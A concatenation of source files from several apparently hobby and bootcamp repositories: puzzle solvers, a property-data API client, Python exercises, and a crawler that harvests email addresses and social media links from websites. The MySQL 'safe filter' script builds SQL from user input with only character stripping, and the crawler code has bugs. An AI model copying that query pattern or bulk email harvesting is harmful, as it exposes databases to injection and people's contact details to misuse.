if '[' in sub or ']' in sub:
return "unknown"
if sub[:2] == ''.join(list(reversed(sub[2:]))):
if sub.count(sub[0]) == 4:
ip7 = False
else:
ip7 = True
if ip7 is False:
return "unknown"
if brackets is True and ip7 is True:
return "invalid"
if brackets is False and ip7 is True:
return "valid"
def count_tls_ips(dayinput):
"""
first half solver:
"""
total = 0
lines = dayinput.split('\n')
for ip in lines:
brackets = False
isvalid_ip = False
start = 0
end = 4
while end <= len(ip):
sub = ip[start:end]
if '[' in sub:
brackets = True
if ']' in sub:
brackets = False
validity = isvalid_tls(sub, brackets)
if validity == "invalid":
isvalid_ip = False
break
if validity == "valid":
isvalid_ip = True
start += 1
end += 1
if isvalid_ip is True:
#print("valid: {}".format(ip))
total += 1
else:
pass
#print("invalid: {}".format(ip))
return total
def isvalid_ssl(sub, brackets):
"""
checks if substring is valid SSL IP7
"""
valid = False
if '[' in sub or ']' in sub:
return "invalid"
if sub[0] == sub[2] and sub[1] != sub[0]:
if brackets == False:
return "validaba"
else:
return "validbab"
return "invalid"
def check_ssl(aba, bab):
"""
checks if any matches of valid aba & bab are found
"""
for a in aba:
for b in bab:
if a[0] == b[1] and b[0] == a[1]:
return True
return False
def count_ssl_ips(dayinput):
"""
second half solver:
"""
total = 0
lines = dayinput.split('\n')
for ip in lines:
brackets = False
start = 0
end = 3
aba = []
bab = []
while end <= len(ip):
sub = ip[start:end]
if '[' in sub:
brackets = True
if ']' in sub:
brackets = False
validity = isvalid_ssl(sub, brackets)
if validity == "validaba":
aba.append(sub)
if validity == "validbab":
bab.append(sub)
start += 1
end += 1
isvalid_ip = check_ssl(aba, bab)
if isvalid_ip is True:
#print("valid: {} - {}:{}".format(ip, aba, bab))
total += 1
else:
pass
#print("invalid: {}".format(ip))
return total
def app():
"""
runs day application
"""
dayinput = readdayinput()
tls_ips = count_tls_ips(dayinput)
ssl_ips = count_ssl_ips(dayinput)
print(tls_ips)
print(ssl_ips)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/template.py
```python
import os
def readdayinput():
"""
Reads day input to solve
"""
thisfile = os.path.basename(__file__)
thisfile = thisfile[:len(thisfile) - 3]
print("{}\n{}".format("-" * len(thisfile), thisfile))
if __name__ == "__main__":
resource = "../resources"
else:
resource = "./resources"
dayinputfile = "{}/{}input.txt".format(resource, thisfile)
with open(dayinputfile, mode='r', encoding='utf-8') as fileio:
dayinput = fileio.read()
dayinput = dayinput.strip('\n')
return dayinput
def first_half(dayinput):
"""
first half solver:
"""
lines = dayinput.split('\n')
def app():
"""
runs day application
"""
dayinput = readdayinput()
result = first_half(dayinput)
print(result)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day13.py
```python
import os
from shared.readdayinput import readdayinput
TEST = """0: 3
1: 2
4: 4
6: 4"""
def reset_firewall(firewall):
for key in firewall.keys():
if firewall[key] is None:
continue
index = firewall[key].index(1)
firewall[key][index] = 0
firewall[key][1] = 1
def copy_firewall(firewall):
copy = {}
for key, val in firewall.items():
if val is None:
copy[key] = val
else:
copy[key] = [x for x in val]
return copy
def shift_firewall(firewall):
for key in firewall.keys():
if firewall[key] is None:
continue
if len(firewall[key]) <= 2:
continue
direction = firewall[key][0]
index = firewall[key].index(1)
firewall[key][index] = 0
if direction == 'F':
index += 1
else:
index -= 1
if index == len(firewall[key]):
index = len(firewall[key]) - 2
firewall[key][0] = 'B'
elif index == 0:
index = 2
firewall[key][0] = 'F'
firewall[key][index] = 1
def run_firewall_is_success(max_layer, firewall):
i = 0
while i < max_layer + 1:
if firewall[i] is None:
pass
elif firewall[i][1] == 1:
return False
shift_firewall(firewall)
i += 1
return True
def run_firewall(max_layer, firewall):
i = 0
total_severity = 0
while i < max_layer + 1:
if firewall[i] is None:
pass
elif firewall[i][1] == 1:
total_severity += i * (len(firewall[i]) - 1)
shift_firewall(firewall)
i += 1
return total_severity
def first_half(dayinput):
"""
first half solver:
"""
lines = dayinput.split('\n')
firewall = {}
for line in lines:
layer, depth = line.split(': ')
firewall[int(layer)] = [0 for x in range(int(depth) + 1)]
firewall[int(layer)][0] = 'F'
firewall[int(layer)][1] = 1
last_layer = max(list(firewall.keys()))
for i in range(last_layer):
if i not in firewall:
firewall[i] = None
result = run_firewall(last_layer, firewall)
return result
def second_half(dayinput):
"""
second half solver:
"""
lines = dayinput.split('\n')
firewall = {}
for line in lines:
layer, depth = line.split(': ')
firewall[int(layer)] = [0 for x in range(int(depth) + 1)]
firewall[int(layer)][0] = 'F'
firewall[int(layer)][1] = 1
last_layer = max(list(firewall.keys()))
for i in range(last_layer):
if i not in firewall:
firewall[i] = None
test = 0
while True:
copy_fire = copy_firewall(firewall)
result = run_firewall_is_success(last_layer, copy_fire)
if result is True:
return test
shift_firewall(firewall)
test += 1
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
#half_two = second_half(TEST)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day17.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
"""
# 344
circlebuffer = [0]
current_pos = 0
steps = 344
index = 0
count = 1
size = 1
all_zeros = []
while count < 50000001:
index += steps + 1
index = index % size
        # circlebuffer.insert(index, count)
if index == 0:
all_zeros.append(count)
size += 1
count += 1
return all_zeros[-1]
def second_half(dayinput):
"""
second half solver:
"""
lines = dayinput.split('\n')
result = None
return result
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day1.py
```python
import os
from shared.readdayinput import readdayinput
testcase = "11221"
def first_half(dayinput):
"""
first half solver:
"""
half = len(dayinput) // 2
end = len(dayinput)
dayinput = dayinput * 2
i = 0
total = 0
while i < end:
next_i = i + half
if dayinput[i] == dayinput[next_i]:
total += int(dayinput[i])
i += 1
return total
def app():
"""
runs day application
"""
dayinput = readdayinput()
result = first_half(dayinput)
print(result)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day9.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(stream):
"""
first half solver:
"""
stream = [x for x in stream]
i = 0
garbage = 0
while i < len(stream):
if stream[i] == '!':
del stream[i]
del stream[i]
continue
if stream[i] == '<':
start = i
temp = i
while temp < len(stream):
if stream[temp] == '!':
del stream[temp]
del stream[temp]
continue
if stream[temp] == '>':
end = temp
break
temp += 1
garbage += (end - start - 1)
stream = stream[:start] + stream[end + 1:]
i += 1
stream = ''.join(stream)
stream = stream.replace(',', '')
#print(stream)
stream = [x for x in stream]
q = []
i = 0
count = 0
while i < len(stream):
if stream[i] == '{':
q.append('{')
if stream[i] == '}':
count += len(q)
q.pop()
i += 1
return [count, garbage]
def second_half(dayinput):
"""
second half solver:
"""
lines = dayinput.split('\n')
result = None
return result
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day2.py
```python
import os
import difflib
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
To make sure you didn't miss any, you scan the likely
candidate boxes again, counting the number that have an
ID containing exactly two of any letter and then separately
counting those with exactly three of any letter. You can
multiply those two counts together to get a rudimentary
checksum and compare it to what your device predicts.
"""
lines = dayinput.split('\n')
result = None
twos = 0
threes = 0
for line in lines:
l_list = [l for l in line]
found_twos = False
found_threes = False
for l in line:
if l_list.count(l) == 2 and not found_twos:
twos += 1
found_twos = True
if l_list.count(l) == 3 and not found_threes:
threes += 1
found_threes = True
return twos * threes
def second_half(dayinput):
"""
second half solver:
What letters are common between the two correct box IDs?
(In the example above, this is found by removing the differing
character from either ID, producing fgij.)
"""
lines = dayinput.split('\n')
result = None
for i in range(len(lines)):
for j in range(i + 1, len(lines)):
line_1 = lines[i]
line_2 = lines[j]
output_list = [li for li in difflib.ndiff(line_1, line_2) if li[0] != ' ']
if len(output_list) == 2:
print(line_1, line_2, output_list)
return None
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
print(half_one)
half_two = second_half(dayinput)
print(half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
``` |
{
"source": "johncoleman83/attom_python_client",
"score": 3
} |
#### File: attom_python_client/api/api.py
```python
import copy
import requests
from api import secrets
from api import defaults
URL = 'https://search.onboard-apis.com/propertyapi/v1.0.0'
ATTOM_URL = 'https://api.gateway.attomdata.com/propertyapi/v1.0.0'
HEADERS_DEFAULT = {
'Accept': 'application/json',
}
headers = copy.deepcopy(HEADERS_DEFAULT)
headers['apikey'] = secrets.API_KEY
def ping():
"""
ping api example property/detail by id
"""
path = "property/detail"
params = "id={}".format(defaults.ID)
headers['apikey'] = defaults.API_KEY
url = "{}/{}?{}".format(URL, path, params)
r = requests.get(url, headers=headers)
return r.json()
```
#### File: attom_python_client/api/attomized_avm.py
```python
import requests
from urllib.parse import quote, urlencode
from api import api
PATH = "attomavm/detail"
def get_avm_by_address(number_street, city_state):
"""
API request to get attomavm/detail
"""
params = urlencode(
{
"address1": number_street,
"address2": city_state,
}
)
url = "{}/{}?{}".format(api.ATTOM_URL, PATH, params)
r = requests.get(url, headers=api.headers)
return r.json()
def get_building_from(p, all_beds, all_baths, all_building_sizes):
b = {
'size': p.get('building', {}).get('size', {}).get('livingsize', None),
'baths': p.get('building', {}).get('rooms', {}).get('bathstotal', None),
'beds': p.get('building', {}).get('rooms', {}).get('beds', None),
'bsmt': p.get('building', {}).get('interior', {}).get('bsmtsize', None),
}
if b.get('beds'):
all_beds.append(b.get('beds'))
if b.get('baths'):
all_baths.append(b.get('baths'))
if b.get('size'):
all_building_sizes.append(b.get('size'))
return b
def get_sale_from(p, all_sale_values):
sale = {
'saleamt': p.get('sale', {}).get('amount', {}).get('saleamt', None),
'saledate': p.get('sale', {}).get('amount', {}).get('salerecdate', None),
}
if sale.get('saleamt') == 0:
sale['saleamt'] = None
if sale.get('saleamt'):
all_sale_values.append(sale.get('saleamt'))
return sale
def get_address_from(p):
return p.get('address', {}).get('line1', "NULL")
def get_lot_from(p):
return p.get('lot', {}).get('lotsize2', "NULL")
def get_market_value_from(p):
return p.get('assessment', {}).get('market', {}).get('mktttlvalue', None)
def get_avm_from(p):
return p.get('avm', {}).get('amount', {}).get('value', None)
```
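The getters above all index into one property record, so a typical caller loops over the response and feeds each record through them. The sketch below is hedged: the address is made up, the top-level `property` list is inferred from how these helpers are used, and valid keys are assumed to be configured in `api.secrets`.
```python
# Sketch: fetch an AVM detail and summarize each returned property record.
# The address is made up and the 'property' key is an inference, not a
# documented guarantee taken from this repository.
from api import attomized_avm

resp = attomized_avm.get_avm_by_address('4529 Winona Court', 'Denver, CO')

all_beds, all_baths, all_sizes, all_sales = [], [], [], []
for p in resp.get('property', []):
    building = attomized_avm.get_building_from(p, all_beds, all_baths, all_sizes)
    sale = attomized_avm.get_sale_from(p, all_sales)
    print(attomized_avm.get_address_from(p), building, sale,
          attomized_avm.get_avm_from(p))
```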
#### File: attom_python_client/file_io/io.py
```python
import datetime
import random
# FILES
FILE_HASH = str(random.random()).split('.')[1]
AVM_RESULTS = "./file_storage/avm_results_{}.py".format(FILE_HASH)
def init_file():
append_to_file_storage("#!/usr/bin/env python3\n\navm_results = [\n")
def terminate_file():
append_to_file_storage("]\n")
def append_to_file_storage(avm_results):
"""
appends the findings to file in case of crash
"""
with open(AVM_RESULTS, "a", encoding="utf-8") as open_file:
open_file.write(avm_results)
``` |
{
"source": "johncoleman83/bootcampschool-higher_level_programming",
"score": 4
} |
#### File: bootcampschool-higher_level_programming/0x01-python-if_else_loops_functions/12-fizzbuzz.py
```python
def fizzbuzz():
s = ["{:d}", "Fizz", "Buzz", "FizzBuzz"]
for i in range(1, 101):
print(s[(i % 3 == 0) + 2 * (i % 5 == 0)].format(i), end=' ')
```
#### File: 0x01-python-if_else_loops_functions/dev/9-print_last_digit.py
```python
def print_last_digit(number):
n = abs(number) % 10
print(n, end='')
return n
```
#### File: bootcampschool-higher_level_programming/0x03-python-data_structures/1-element_at.py
```python
def element_at(my_list, idx):
if idx >= 0 and idx < len(my_list):
return my_list[idx]
else:
return None
```
#### File: 0x03-python-data_structures/dev/0-print_list_integer.py
```python
def print_list_integer(my_list=[]):
for i in my_list:
print("{:d}".format(i))
```
#### File: 0x03-python-data_structures/dev/4-new_in_list.py
```python
def new_in_list(my_list, idx, element):
new_list = my_list[:]
if idx >= 0 and idx < len(my_list):
new_list[idx] = element
return new_list
```
#### File: bootcampschool-higher_level_programming/0x05-python-exceptions/5-raise_exception.py
```python
def raise_exception():
"an" / "error"
```
#### File: bootcampschool-higher_level_programming/0x0B-python-input_output/0-read_file.py
```python
def read_file(filename=""):
"""reads text file"""
with open(filename, mode='r', encoding='utf-8') as a_file:
print(a_file.read(), end='')
a_file.close()
```
#### File: bootcampschool-higher_level_programming/0x0B-python-input_output/11-student.py
```python
class Student():
"""Student class with name and age"""
def __init__(self, first_name, last_name, age):
"""initializes new instance of Student"""
self.first_name = first_name
self.last_name = last_name
self.age = age
def to_json(self):
"""returns dict attributes of Student"""
try:
obj_dict = self.__dict__
return obj_dict
except:
return {}
```
#### File: bootcampschool-higher_level_programming/0x0B-python-input_output/6-from_json_string.py
```python
import json
def from_json_string(my_str):
"""loads (decodes/ converts) string to JSON"""
return (json.loads(my_str))
```
#### File: 0x0B-python-input_output/dev/9-add_item.py
```python
from sys import argv
load_from_json_file = __import__('8-load_from_json_file').load_from_json_file
save_to_json_file = __import__('7-save_to_json_file').save_to_json_file
def app():
"""adds input args to file"""
try:
a_list = load_from_json_file('./add_item.json')
except:
a_list = []
for i in range(1, len(argv)):
a_list.append(argv[i])
save_to_json_file(a_list, './add_item.json')
if __name__ == '__main__':
app()
```
#### File: bootcampschool-higher_level_programming/0x0F-python-object_relational_mapping/3-my_safe_filter_states.py
```python
import MySQLdb
import sys
def init_db():
"""initializes a db with MySQLdb"""
db = MySQLdb.connect(host='localhost',
port=3306,
user=sys.argv[1],
passwd=sys.argv[2],
db=sys.argv[3])
return db
def parse_input(s):
"""parses input removing single quotes and semicolons"""
s = ''.join([i for i in s if i != "'" and i != ';'])
return s
def print_one_state(db):
"""prints one state from input DB with SQL injection safeguard"""
cur = db.cursor()
name = parse_input(sys.argv[4])
cur.execute("SELECT * FROM states "
"WHERE name LIKE BINARY '%{}%' "
"ORDER BY states.id ASC".format(name))
for row in cur.fetchall():
print(row)
cur.close()
db.close()
if __name__ == "__main__":
print_one_state(init_db())
```
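Stripping quotes and semicolons narrows the attack surface, but the statement above is still assembled with `format()`. MySQLdb can also bind the value itself, letting the driver do the escaping; the sketch below shows that variant under the same table and column names (an alternative, not the script's original approach).
```python
# Sketch: the same state lookup with a driver-bound parameter instead of
# string interpolation; table and column names match the script above, and
# db is an already-open MySQLdb connection as returned by init_db().
def print_one_state_parameterized(db, name):
    """prints matching states using a parameterized LIKE query"""
    cur = db.cursor()
    cur.execute("SELECT * FROM states "
                "WHERE name LIKE BINARY %s "
                "ORDER BY states.id ASC", ("%{}%".format(name),))
    for row in cur.fetchall():
        print(row)
    cur.close()
    db.close()
```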
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/102-starwars.py
```python
import requests
import sys
def request_to_star_wars(the_url, payload):
"""makes a request to input URL with q as a parameter"""
res = requests.get(the_url, params=payload).json()
results_dict = {}
name_list = []
count = res.get('count')
if count > 0:
results = res.get('results')
for character in results:
name = character.get('name')
films = character.get('films')
name_list.append(name)
results_dict[name] = films
next_page = res.get('next')
while next_page:
res = requests.get(next_page).json()
results = res.get('results')
for character in results:
name = character.get('name')
films = character.get('films')
name_list.append(name)
results_dict[name] = films
next_page = res.get('next')
for k, v in results_dict.items():
films_list = []
for film in v:
res = requests.get(film).json()
title = res.get('title')
films_list.append(title)
results_dict[k] = films_list
print("Number of results: {}".format(count))
for name in name_list:
print(name)
for title in results_dict[name]:
print('\t{}'.format(title))
if __name__ == "__main__":
"""MAIN APP"""
the_url = "https://swapi.co/api/people/"
payload = {'search': sys.argv[1]}
request_to_star_wars(the_url, payload)
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/103-search_twitter.py
```python
import requests
import sys
import base64
def base_64_encode(key, secret):
"""encodes key and secret in base 64 for the auth credential"""
conversion_string = "{}:{}".format(key, secret).encode('ascii')
auth_credential = base64.b64encode(conversion_string)
auth_credential = auth_credential.decode()
return auth_credential
def get_bearer_token(auth_credential):
"""gets bearer token from twitter OAuth"""
oauth_url = "https://api.twitter.com/oauth2/token"
the_header = {
"Authorization": "Basic {}".format(auth_credential),
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8"
}
the_data = {
"grant_type": "client_credentials"
}
res = requests.post(
oauth_url,
headers=the_header,
data=the_data
)
res = res.json()
if res.get("token_type") == "bearer":
bearer_token = res.get("access_token")
return bearer_token
else:
raise Exception("ERROR, no bearer token returned")
def make_query(query_param, bearer_token):
"""makes a request to twitter search api using the input values:
the query, and the bearer token"""
query_url = 'https://api.twitter.com/1.1/search/tweets.json'
payload = {
'q': query_param
}
the_header = {
'Authorization': 'Bearer {}'.format(bearer_token)
}
res = requests.get(
query_url,
params=payload,
headers=the_header
)
return res.json()
def print_five_tweets(response):
"""prints five tweets from response of twitter API request
FORMAT: [<Tweet ID>] <Tweet text> by <Tweet owner name>"""
statuses = response.get('statuses')
the_range = 5 if len(statuses) > 5 else len(statuses)
for i in range(the_range):
tweet = statuses[i]
tweet_id = tweet.get('id_str')
tweet_text = tweet.get('text')
tweet_user_name = tweet.get('user').get('name')
print("[{}] {} by {}".format(tweet_id, tweet_text, tweet_user_name))
def query_twitter_api_run_app():
"""main application: authenticates credentials from user input,
then searches twitter api from input search terms"""
key = sys.argv[1]
secret = sys.argv[2]
query_param = sys.argv[3]
auth_credential = base_64_encode(key, secret)
bearer_token = get_bearer_token(auth_credential)
response = make_query(query_param, bearer_token)
print_five_tweets(response)
if __name__ == "__main__":
"""MAIN APP"""
query_twitter_api_run_app()
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/10-my_github.py
```python
import requests
from requests.auth import HTTPBasicAuth
import sys
def request_to_github(the_url, un, pw):
"""makes a request to input URL with q as a parameter"""
r = requests.get(the_url, auth=HTTPBasicAuth(un, pw))
the_json = r.json()
print("{}".format(the_json.get("id")))
if __name__ == "__main__":
"""MAIN APP"""
the_url = 'https://api.github.com/user'
request_to_github(the_url, sys.argv[1], sys.argv[2])
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/3-error_code.py
```python
import urllib.request
import sys
def request_error_check(the_url):
"""makes a request to input URL with checks for errors"""
req = urllib.request.Request(the_url)
try:
with urllib.request.urlopen(req) as response:
html = response.read()
print("{}".format(html.decode('utf8')))
except urllib.error.URLError as e:
print("Error code: {}".format(e.code))
if __name__ == "__main__":
"""MAIN APP"""
the_url = sys.argv[1]
request_error_check(the_url)
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/5-btcp_header.py
```python
import requests
import sys
def value_request_id(the_url):
"""makes a request to input URL & displays value of X-Request-Id"""
r = requests.get(the_url)
print("{}".format(r.headers.get("X-Request-Id")))
if __name__ == "__main__":
"""MAIN APP"""
the_url = sys.argv[1]
value_request_id(the_url)
``` |
{
"source": "johncoleman83/bootcamp-system_engineering-devops",
"score": 3
} |
#### File: bootcamp-system_engineering-devops/0x16-api/0-gather_data_from_an_API.py
```python
import requests
import sys
def make_request(data, num):
"""
makes employee request and returns json dict response
"""
root = 'https://jsonplaceholder.typicode.com'
url = '{}{}{}'.format(root, data, num)
return requests.get(url).json()
def app(num):
"""
makes request for info about employee todo list, then prints
"""
employee = make_request('/users/', num)
todos = make_request('/todos/?userId=', num)
completed = [t.get('title') for t in todos if t.get('completed')]
total = len(todos)
print('Employee {} is done with tasks({}/{}):'.format(
employee.get('name'), len(completed), total))
for t in completed:
print('\t {}'.format(t))
if __name__ == '__main__':
"""
MAIN App
"""
if len(sys.argv) > 1 and sys.argv[1].isdigit():
app(sys.argv[1])
``` |
{
"source": "johncoleman83/broken_link_checker",
"score": 3
} |
#### File: johncoleman83/broken_link_checker/domain_scraper.py
```python
import getopt, sys, os
import argparse
import random
from modules import *
def parse_and_handle_args(args):
"""
Handles arguments extracted from the user inputs
#Set input var and build url path to input (points to working directory)
"""
print('your selection:\n{}'.format(args))
if not args.url:
if args.input_file == []:
print('Usage:\n$ ./domain_scraper.py --help', file=sys.stderr)
sys.exit(1)
input_file = args.input_file[0]
if 'input_file=' in input_file:
input_file = input_file.split('=')[1]
        INPUT_FILE = os.path.join(os.getcwd(), input_file)
else:
INPUT_URL = args.url[0]
INPUT_FILE = None
if args.url:
print('executing: {}'.format(url_input))
url_input.execute(INPUT_URL)
elif args.check:
print('executing: {}'.format(check))
check.execute(INPUT_FILE)
elif args.check_json:
print('executing: {}'.format(check_json))
check_json.execute(INPUT_FILE)
elif args.extract:
print('executing: {}'.format(extract))
extract.execute(INPUT_FILE)
elif args.scrape:
print('executing: {}'.format(scrape))
scrape.execute(INPUT_FILE)
elif args.scrape_n:
print('executing: {}'.format(scrape_n))
scrape_n.execute(INPUT_FILE)
def init_parser():
"""
sets up parser with expected arguments
"""
parser = argparse.ArgumentParser(
prog='domain_scraper',
description='''Scrapes domains from one input URL or
from a file list of domains for broken links,
valid emails, and valid social media links.''',
)
parser.add_argument(
'input_file',
        help='Indicate the input file to scrape. Files must be formatted like the files in the examples directory.',
type=str,
nargs='*'
)
parser.add_argument(
'--url',
help='Indicate the url to scrape.',
type=str,
nargs='*'
)
parser.add_argument(
'--check',
help='Find broken links from urls in input file.',
const=True, default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--check-json',
help='Find broken links from urls in input json.',
const=True,
default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--extract',
help='Extract name from emails in input file.',
const=True,
default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--scrape',
help='Scrape emails and social media urls from urls in file.',
const=True,
default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--scrape-n',
help='Scrape emails and social media urls from urls in file while adding new urls to the queue to scrape.',
const=True,
default=False,
type=bool,
nargs='?'
)
return parser
def execute():
"""
MAIN APP
"""
parser = init_parser()
parsed_args = parser.parse_args()
parse_and_handle_args(parsed_args)
if __name__ == "__main__":
if len(sys.argv) <= 2 and '--help' not in sys.argv:
print('Usage:\n$ ./domain_scraper.py --help', file=sys.stderr)
sys.exit(1)
execute()
```
#### File: broken_link_checker/modules/scrape_emails_and_social_media.py
```python
from bs4 import BeautifulSoup
from modules.errors import insert
from modules.file_io import io
from modules.urls import helpers
import queue
import re
import os
import requests
# url helpers
url_is_new = helpers.url_is_new
url_is_image_or_css_link = helpers.url_is_image_or_css_link
do_social_media_checks = helpers.do_social_media_checks
# Storage
all_links = set()
all_social_links = set()
all_emails = set()
links_to_scrape_q = queue.Queue()
# Requests
TIMEOUT = (3, 10)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
def parse_response_for_emails(r):
"""
looks for emails in response
"""
emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", r.text, re.I)) - all_emails
valid_emails = set()
for e in emails:
if not url_is_image_or_css_link(e):
valid_emails.add(e)
if len(valid_emails) > 0:
all_emails.update(valid_emails)
return valid_emails
def parse_response(r):
"""
parses response text for new links to add to queue
"""
soup = BeautifulSoup(r.text, 'html.parser')
    pattern = re.compile(r'(http.*\:\/\/.*\.+.*\/.*)', re.IGNORECASE)
social_links = set()
for link in soup.find_all('a'):
new_url = link.get('href', None)
if new_url.__class__.__name__ != 'str' or len(new_url) == 0: continue
url_lowered = new_url.lower()
m = re.search(pattern, new_url)
if m is None:
continue
if do_social_media_checks(url_lowered, all_social_links):
social_links.add(new_url)
all_social_links.add(url_lowered)
emails = parse_response_for_emails(r)
return emails, social_links
def scrape_url(url):
"""
makes request to input url and passes the response to be scraped and parsed
if it is not an error code response
"""
try:
r = requests.get(url, allow_redirects=True, timeout=TIMEOUT)
except Exception as e:
print('ERROR with URL: {}'.format(url))
return
status_code = r.status_code
if r and r.headers:
content_type = r.headers.get('Content-Type', 'None')
else:
return
if (status_code >= 300 or content_type.__class__.__name__ != 'str' or 'text/html' not in content_type.lower()):
print('ERROR with URL: {}, status: {}, content-type: {}'.format(url, status_code, content_type))
return
emails, social_links = parse_response(r)
io.temp_write_updates_to_files(url, emails, social_links)
def loop_all_links():
"""
loops through and makes request for all queue'd url's
"""
while links_to_scrape_q.empty() is False:
url = links_to_scrape_q.get()
scrape_url(url)
def execute(INPUT_FILE):
"""
completes all tasks of the application
"""
io.read_file_add_to_queue(INPUT_FILE, all_links, links_to_scrape_q)
io.initial_files([
io.TEMP_EMAIL_OUTPUT_FILE, io.TEMP_SOCIAL_OUTPUT_FILE, io.CHECKED_URLS
])
loop_all_links()
if __name__ == "__main__":
"""
MAIN APP
"""
print('usage: import this')
```
#### File: broken_link_checker/modules/scrape_emails_and_social_media_with_new_links.py
```python
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from modules.errors import insert
from modules.file_io import io
from modules.urls import helpers
import queue
import re
import os
import requests
import datetime
import random
# url helpers
url_is_new = helpers.url_is_new
url_is_image_or_css_link = helpers.url_is_image_or_css_link
url_is_valid = helpers.url_is_valid
do_social_media_checks = helpers.do_social_media_checks
# Storage
all_links = set()
all_social_links = set()
all_emails = set()
links_to_scrape_q = queue.Queue()
# Requests
TIMEOUT = (3, 10)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
# FILES
FILE_HASH = str(random.random()).split('.')[1]
ALL_OUTPUT_FILE = './file_storage/email_social_links_' + FILE_HASH
NEWLY_FOUND_URLS = './file_storage/newly_found_urls_' + FILE_HASH
# REGEX
EMAIL_PATH_PATTERN = re.compile('about|affiliations|board|departments|directory|governance|leadership|staff|team', re.IGNORECASE|re.DOTALL)
def url_could_contain_email_link(original_domain, parsed_url_object, url):
"""
checks if input url could contian a link with emails
"""
if not original_domain or original_domain not in url: return False
if url_could_be_social_media(url): return False
query = parsed_url_object.query
if query.__class__.__name__ == 'str' and len(query) > 0: return False
path = parsed_url_object.path
if path.__class__.__name__ != 'str' or len(path) < 4: return False
path = path.lower()
m = re.search(EMAIL_PATH_PATTERN, path)
return m is not None
def get_original_domain_from_url(parsed_url_object):
"""
gets the original domain
"""
original_domain = parsed_url_object.netloc
if original_domain.__class__.__name__ != 'str' or len(original_domain) == 0:
return None
return original_domain
def parse_response_for_emails(r):
"""
looks for emails in response
"""
emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", r.text, re.I)) - all_emails
valid_emails = set()
for e in emails:
if not url_is_image_or_css_link(e):
valid_emails.add(e)
if len(valid_emails) > 0:
all_emails.update(valid_emails)
return valid_emails
def parse_response(original_domain, r):
"""
parses response text for new links to add to queue
"""
soup = BeautifulSoup(r.text, 'html.parser')
    pattern = re.compile(r'(http.*\:\/\/.*\.+.*\/.*)', re.IGNORECASE)
social_links = set()
for link in soup.find_all('a'):
new_url = link.get('href', None)
if new_url.__class__.__name__ != 'str' or len(new_url) == 0: continue
url_lowered = new_url.lower()
parsed_url_object = urlparse(url_lowered)
m = re.search(pattern, new_url)
if m is None or not url_is_valid(url_lowered, all_links):
continue
if do_social_media_checks(url_lowered, all_social_links):
social_links.add(new_url)
all_social_links.add(url_lowered)
if url_could_contain_email_link(original_domain, parsed_url_object, url_lowered):
with open(NEWLY_FOUND_URLS, "a", encoding="utf-8") as open_file:
open_file.write("{}\n".format(new_url))
all_links.add(new_url)
links_to_scrape_q.put(new_url)
emails = parse_response_for_emails(r)
return emails, social_links
def scrape_url(url):
"""
makes request to input url and passes the response to be scraped and parsed
if it is not an error code response
"""
try:
r = requests.get(url, allow_redirects=True, timeout=TIMEOUT)
except Exception as e:
print('ERROR with URL: {}'.format(url))
return
status_code = r.status_code
if r and r.headers:
content_type = r.headers.get('Content-Type', 'None')
else:
return
if (status_code >= 300 or content_type.__class__.__name__ != 'str' or 'text/html' not in content_type.lower()):
print('ERROR with URL: {}, status: {}, content-type: {}'.format(url, status_code, content_type))
return
parsed_original_url_object = urlparse(url)
original_domain = get_original_domain_from_url(parsed_original_url_object)
emails, social_links = parse_response(original_domain, r)
io.temp_write_updates_to_files(url, emails, social_links)
def loop_all_links():
"""
loops through and makes request for all queue'd url's
"""
while links_to_scrape_q.empty() is False:
url = links_to_scrape_q.get()
scrape_url(url)
def write_results_to_file():
"""
final writing of results
"""
FIRST_LINE = "TIME: {}\n".format(str(datetime.datetime.now()))
with open(ALL_OUTPUT_FILE, "w", encoding="utf-8") as open_file:
open_file.write(FIRST_LINE)
for url, meta in all_links.items():
if meta.__class__.__name__ == 'dict':
line = "url: {}\n".format(url)
if len(meta.get('emails', 0)) > 0:
line += "emails: {}\n".format(meta.get('emails', 0))
if len(meta.get('social_media', 0)) > 0:
line += "social_media: {}\n".format(meta.get('social_media', 0))
open_file.write(line)
def execute(INPUT_FILE):
"""
completes all tasks of the application
"""
io.read_file_add_to_queue(INPUT_FILE, all_links, links_to_scrape_q)
io.initial_files([
io.TEMP_EMAIL_OUTPUT_FILE, io.TEMP_SOCIAL_OUTPUT_FILE, io.CHECKED_URLS, NEWLY_FOUND_URLS
])
loop_all_links()
